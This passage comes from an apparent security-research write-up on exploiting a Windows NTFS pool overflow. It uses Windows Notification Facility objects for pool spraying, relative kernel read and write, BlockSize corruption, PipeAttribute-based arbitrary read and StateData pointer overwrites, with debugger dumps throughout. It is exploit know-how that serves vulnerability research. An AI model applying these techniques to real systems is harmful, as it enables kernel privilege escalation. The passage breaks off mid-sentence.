ffffbe0f623d7e30 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7e60 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7e90 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7ec0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7ef0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7f20 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7f50 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7f80 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7fb0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and content, and so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There is also an API call which does this, NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData, which in turn ends up freeing our allocation.

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine whether the LFH makes use of delayed free lists; from empirical testing, I did not seem to be hitting this after a large spray of Wnf chunks.



Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

    nt!_WNF_STATE_DATA
       +0x000 Header : _WNF_NODE_HEADER
       +0x004 AllocatedSize : Uint4B
       +0x008 DataSize : Uint4B
       +0x00c ChangeStamp : Uint4B

DataSize denotes the size of the actual data following the structure in memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.
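A toy model shows why a corrupted DataSize becomes a relative read. It assumes, as the text describes, that the copy length is taken from the chunk's own DataSize field; the flat `pool` array, the two adjacent 0x30 chunks and `model_query_state` are all hypothetical and stand in for the real NtQueryWnfStateData/ExpWnfReadStateData logic, which has more checks than shown here.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Per-chunk layout: 0x10 pool header, 0x10 _WNF_STATE_DATA, then data. */
enum { HDR = 0x10, STATE = 0x10, DATA_OFF = HDR + STATE };

static uint32_t read_u32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void write_u32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Hypothetical read path: copies DataSize bytes from after the state
 * header. Returns the bytes copied, or 0 if out is too small. */
static uint32_t model_query_state(const uint8_t *chunk, uint8_t *out,
                                  uint32_t out_len)
{
    uint32_t data_size = read_u32(chunk + HDR + 0x8);   /* DataSize */
    if (out_len < data_size)
        return 0;
    memcpy(out, chunk + DATA_OFF, data_size);           /* trusts DataSize */
    return data_size;
}
```

Raising DataSize from 0x10 to 0x20 in the first chunk makes the model return the neighbouring chunk's `_POOL_HEADER` (including its "Wnf " tag) after the legitimate 0x10 bytes of data.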

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

    nt!_WNF_NAME_INSTANCE
       +0x000 Header : _WNF_NODE_HEADER
       +0x008 RunRef : _EX_RUNDOWN_REF
       +0x010 TreeLinks : _RTL_BALANCED_NODE
       +0x028 StateName : _WNF_STATE_NAME_STRUCT
       +0x030 ScopeInstance : Ptr64 _WNF_SCOPE_INSTANCE
       +0x038 StateNameInfo : _WNF_STATE_NAME_REGISTRATION
       +0x050 StateDataLock : _WNF_LOCK
       +0x058 StateData : Ptr64 _WNF_STATE_DATA
       +0x060 CurrentChangeStamp : Uint4B
       +0x068 PermanentDataStore : Ptr64 Void
       +0x070 StateSubscriptionListLock : _WNF_LOCK
       +0x078 StateSubscriptionListHead : _LIST_ENTRY
       +0x088 TemporaryNameListEntry : _LIST_ENTRY
       +0x098 CreatorProcess : Ptr64 _EPROCESS
       +0x0a0 DataSubscribersCount : Int4B
       +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some example output from my code:

    found corrupted element changeTimestamp 54545454 at index 4972
    len is 0xff
    41 41 41 41 42 42 42 42 43 43 43 43 44 44 44 44 | AAAABBBBCCCCDDDD
    00 00 03 0B 57 6E 66 20 E0 56 0B C7 F9 97 D9 42 | ....Wnf .V.....B
    04 09 10 00 10 00 00 00 10 00 00 00 01 00 00 00 | ................
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
    00 00 03 0B 57 6E 66 20 D0 56 0B C7 F9 97 D9 42 | ....Wnf .V.....B
    04 09 10 00 10 00 00 00 10 00 00 00 01 00 00 00 | ................
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
    00 00 03 0B 57 6E 66 20 80 56 0B C7 F9 97 D9 42 | ....Wnf .V.....B
    04 09 10 00 10 00 00 00 10 00 00 00 01 00 00 00 | ................
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
    00 00 03 03 4E 74 66 30 70 76 6B D8 F9 97 D9 42 | ....Ntf0pvk....B
    60 D6 55 AA 85 B4 FF FF 01 00 00 00 00 00 00 00 | `.U.............
    7D B0 29 01 00 00 00 00 41 41 41 41 41 41 41 41 | }.).....AAAAAAAA
    00 00 03 0B 57 6E 66 20 20 76 6B D8 F9 97 D9 42 | ....Wnf  vk....B
    04 09 10 00 10 00 00 00 10 00 00 00 01 00 00 00 | ................
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    | AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
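Leaked rows like those above can be decoded field by field. The following is a minimal sketch, assuming little-endian field order (x64) and the offsets from the `_POOL_HEADER` and `_WNF_STATE_DATA` dt output; the helper names are hypothetical. In the output above the corrupted element reports ChangeStamp 0x54545454 ("TTTT"), presumably bytes from the overflow data, so a stamp that differs from the one set during the spray singles it out.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Decoded view of the first 8 bytes of a leaked _POOL_HEADER. */
typedef struct {
    uint8_t previous_size, pool_index, block_size, pool_type;
    char    tag[5];
} pool_header_view;

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static pool_header_view parse_pool_header(const uint8_t row[16])
{
    pool_header_view v;
    v.previous_size = row[0];
    v.pool_index    = row[1];
    v.block_size    = row[2];      /* chunk size / 16 */
    v.pool_type     = row[3];
    memcpy(v.tag, row + 4, 4);     /* PoolTag, e.g. "Wnf " */
    v.tag[4] = '\0';
    return v;
}

/* Accessors for a 16-byte row holding a _WNF_STATE_DATA header. */
static uint32_t wnf_alloc_size(const uint8_t row[16])   { return le32(row + 0x4); }
static uint32_t wnf_data_size(const uint8_t row[16])    { return le32(row + 0x8); }
static uint32_t wnf_change_stamp(const uint8_t row[16]) { return le32(row + 0xc); }
```

Applied to the second and third rows of the dump, this yields a 0x30 "Wnf " chunk with PoolType 0x0B whose state header has AllocatedSize and DataSize of 0x10 and ChangeStamp 1.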

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.
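The write side can be modelled the same way. This sketch assumes only what the paragraph above states: if the new data fits within AllocatedSize, the existing buffer is reused and the data is copied in place. Everything else (the flat `pool` array, `model_update_state`, returning 0 instead of reallocating) is a hypothetical simplification of ExpWnfWriteStateData.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { STATE_HDR = 0x10 };  /* size of _WNF_STATE_DATA before the data */

static uint32_t get_u32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void put_u32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* state points at a _WNF_STATE_DATA header. Returns 1 if the data was
 * copied in place, 0 where the real code would allocate a new buffer. */
static int model_update_state(uint8_t *state, const uint8_t *input,
                              uint32_t length)
{
    uint32_t allocated = get_u32(state + 0x4);    /* AllocatedSize */
    if (length > allocated)
        return 0;                                 /* would reallocate */
    memcpy(state + STATE_HDR, input, length);     /* trusts AllocatedSize */
    put_u32(state + 0x8, length);                 /* update DataSize */
    return 1;
}
```

With the original AllocatedSize of 0x10, a 0x20-byte update is not done in place; once AllocatedSize is corrupted to a larger value, the same update runs past the chunk and overwrites the neighbouring pool header.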

So at this point it's worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.



_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption led me to try pivoting to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore, my approach was to use the NTFS overflow to corrupt the BlockSize in the _POOL_HEADER of a 0x30-sized WNF chunk.

    nt!_POOL_HEADER
       +0x000 PreviousSize : 0y00000000 (0)
       +0x000 PoolIndex : 0y00000000 (0)
       +0x002 BlockSize : 0y00000011 (0x3)
       +0x002 PoolType : 0y00000011 (0x3)
       +0x000 Ulong1 : 0x3030000
       +0x004 PoolTag : 0x4546744e
       +0x008 ProcessBilled : 0x0057005c`007d0062 _EPROCESS
       +0x008 AllocatorBackTraceIndex : 0x62
       +0x00a PoolTagHash : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk's address to be stored within the wrong lookaside list for its size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.
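The steps above can be sketched as a toy simulation. It assumes the PoolQuota bit is 0x08 (it is set in the quota-charged Wnf headers, PoolType 0x0B, and clear in the NtFE header, PoolType 0x03, shown in this post), and it replaces the real lookaside/LFH machinery with a hypothetical one-slot-per-BlockSize cache. `forge_pool_header`, `toy_free` and `toy_alloc` are illustrative names, and the 0x220 size mirrors the WNF chunk used below.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define POOL_QUOTA  0x08u  /* assumed PoolQuota bit of PoolType */
#define NUM_BUCKETS 0x40u

/* Rewrites BlockSize (byte 2) and clears the PoolQuota bit in PoolType
 * (byte 3) of a 16-byte _POOL_HEADER, as the overflow data would. */
static void forge_pool_header(uint8_t hdr[16], uint32_t fake_chunk_size)
{
    hdr[2] = (uint8_t)(fake_chunk_size / 16u);
    hdr[3] = (uint8_t)(hdr[3] & ~POOL_QUOTA);
}

/* Toy lookaside: caches one freed chunk per BlockSize. It only shows that
 * the free path trusts the header, not how the real lists work. */
typedef struct {
    uintptr_t slot[NUM_BUCKETS];
} toy_lookaside;

static void toy_free(toy_lookaside *l, uintptr_t addr, const uint8_t hdr[16])
{
    l->slot[hdr[2] % NUM_BUCKETS] = addr;     /* bucket taken from header */
}

static uintptr_t toy_alloc(toy_lookaside *l, uint32_t chunk_size)
{
    uint32_t bucket = (chunk_size / 16u) % NUM_BUCKETS;
    uintptr_t addr = l->slot[bucket];
    l->slot[bucket] = 0;
    return addr;                              /* 0 if nothing is cached */
}
```

After forging a 0x30 Wnf header to claim 0x220 bytes and freeing it, a 0x30 request finds nothing, while a 0x220 request is handed the original 0x30 chunk's address, so the larger object now overlaps memory that the NTFS overflow can reach.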

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

```
1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
ffff9a82c1cd4000 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4030 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4060 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4090 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd40c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd40f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4120 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4150 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4180 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd41b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd41e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4210 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4240 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4270 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd42a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd42d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4300 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4330 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4360 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4390 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd43c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd43f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4420 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4450 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4480 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd44b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd44e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4510 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4540 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4570 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd45a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd45d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4600 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4630 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4660 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4690 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd46c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd46f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4720 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4750 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4780 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd47b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd47e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4810 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4840 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4870 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd48a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd48d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4900 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4930 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4960 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4990 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd49c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd49f0 size: 30 previous size: 0 (Free) NtFE
*ffff9a82c1cd4a20 size: 220 previous size: 0 (Allocated) *Wnf Process: ffff8608b72bf080
        Pooltag Wnf : Windows Notification Facility, Binary : nt!wnf
ffff9a82c1cd4c30 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4c60 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4c90 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4cc0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4cf0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4d20 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4d50 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
ffff9a82c1cd4d80 size: 30 previous size: 0 (Allocated) Wnf Process: ffff8608b72bf080
```

The real goal, however, is to find a more interesting object to corrupt. As a quick win, I also used the PipeAttribute object from the great paper by Bayet and Fariello: https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf

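```c
#include <windows.h>   // LIST_ENTRY

// PipeAttribute layout, as described in the SSTIC 2020 paper above
typedef struct pipe_attribute {
    LIST_ENTRY list;        // Flink/Blink linking the pipe's attributes together
    char* AttributeName;
    size_t ValueSize;       // size of the attribute value
    char* AttributeValue;   // pointer to the attribute value
    char data[];            // variable-length trailing data (C99 flexible array member)
} pipe_attribute_t;
```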

As PipeAttribute chunks are also of controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout, we can corrupt the PipeAttribute's Flink pointer and point it back to a fake pipe attribute, as described in the paper above. Please refer to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.



The journey to arbitrary write



After this minor PipeAttribute detour I took a step back. Having realised that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area where the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would succeed.

Looking at the creation of the _WNF_NAME_INSTANCE, we can see that it is 0xA8 bytes plus the 0x10-byte POOL_HEADER, so 0xB8 in total. This ends up being placed in a 0xC0 chunk within the segment pool:
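The rounding from 0xB8 to 0xC0 can be sketched as follows. This assumes the segment pool rounds each request plus its 0x10-byte header up to a multiple of 0x10 (the unit BlockSize counts in), which reproduces the 0xC0 chunk observed here; the real allocator's size classes may differ for other sizes. The function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define POOL_HEADER_SIZE 0x10u   /* _POOL_HEADER on x64 */
#define POOL_GRANULARITY 0x10u   /* assumed rounding unit */

/* Chunk size for a request, under the rounding assumption above. */
static size_t pool_chunk_for(size_t request) {
    size_t total = request + POOL_HEADER_SIZE;   /* e.g. 0xA8 -> 0xB8 */
    return (total + POOL_GRANULARITY - 1) & ~(size_t)(POOL_GRANULARITY - 1);
}

/* The _WNF_NAME_INSTANCE case from the text. */
static void check_name_instance_size(void) {
    assert(pool_chunk_for(0xA8) == 0xC0);
}
```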

So the aim is to have the following occur:

As before, we can perform a spray using _WNF_STATE_DATA of any size, which will lead to a _WNF_NAME_INSTANCE being allocated for each _WNF_STATE_DATA created.

We can therefore end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

```
ffffdd09b35c8010 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c80d0 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8190 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
*ffffdd09b35c8250 size: c0 previous size: 0 (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
ffffdd09b35c8310 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c83d0 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8490 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8550 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8610 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c86d0 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8790 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8850 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8910 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c89d0 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8a90 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8b50 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8c10 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8cd0 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8d90 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8e50 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
ffffdd09b35c8f10 size: c0 previous size: 0 (Allocated) Wnf Process: ffff8d87686c8080
```

Before the corruption, we can see the following structure values:

```
1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header : _WNF_NODE_HEADER
   +0x008 RunRef : _EX_RUNDOWN_REF
   +0x010 TreeLinks : _RTL_BALANCED_NODE
   +0x028 StateName : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock : _WNF_LOCK
   +0x058 StateData : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null)
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0
```

Then, after our NTFS extended attributes overflow has occurred, we have overwritten a number of fields:

```
1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header : _WNF_NODE_HEADER
   +0x008 RunRef : _EX_RUNDOWN_REF
   +0x010 TreeLinks : _RTL_BALANCED_NODE
   +0x028 StateName : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock : _WNF_LOCK
   +0x058 StateData : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null)
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0
```

For example, the StateData pointer has been modified to point into an EPROCESS structure (0xffff8d87686c8088 is 8 bytes past the EPROCESS at ffff8d87686c8080):

```
1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088) : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp : 0xffff8d87 [Type: unsigned long]

PROCESS ffff8d87686c8080
    SessionId: 1 Cid: 1760 Peb: 100371000 ParentCid: 1210
    DirBase: 873d5000 ObjectTable: ffffdd09b2999380 HandleCount: 46.
    Image: TestEAOverflow.exe
```
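The odd-looking AllocatedSize, DataSize and ChangeStamp values follow from what sits at EPROCESS+0x8. The dump is consistent with an empty LIST_ENTRY there whose Flink and Blink both point back at itself (assumed here to be the wait list head in the process's dispatcher header). The C sketch below, with hypothetical names, reinterprets two copies of that 64-bit pointer as the _WNF_STATE_DATA header fields at the offsets from the dx output, and reproduces the values shown. It assumes a little-endian host. Because AllocatedSize ends up as the top half of a kernel address, it is a very large value, which is presumably what lets the bounds checks in ExpWnfWriteStateData pass.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Header fields of nt!_WNF_STATE_DATA, per the dx output above. */
typedef struct {
    uint32_t header;          /* +0x000 _WNF_NODE_HEADER (raw 4 bytes) */
    uint32_t allocated_size;  /* +0x004 */
    uint32_t data_size;       /* +0x008 */
    uint32_t change_stamp;    /* +0x00c */
} wnf_state_data_hdr_t;

/* Treat an empty, self-referencing LIST_ENTRY at list_addr as a
   _WNF_STATE_DATA header (Flink == Blink == list_addr). */
static wnf_state_data_hdr_t overlay_empty_list(uint64_t list_addr) {
    uint64_t raw[2] = { list_addr, list_addr };   /* Flink, Blink */
    wnf_state_data_hdr_t hdr;
    memcpy(&hdr, raw, sizeof hdr);                /* 16 bytes, little-endian host */
    return hdr;
}

/* Values taken from the dx output above. */
static void check_dumped_state_data(void) {
    wnf_state_data_hdr_t h = overlay_empty_list(0xffff8d87686c8088ULL);
    assert(h.allocated_size == 0xffff8d87u);
    assert(h.data_size      == 0x686c8088u);
    assert(h.change_stamp   == 0xffff8d87u);
}
```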

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, given the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that the bug could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

The external version of the StateName is the internal version of the StateName XOR'd with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

```
1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348)) [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence : 0x1a33 [Type: unsigned __int64]

1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348 00d19931
```

Or in bitwise operations:

```
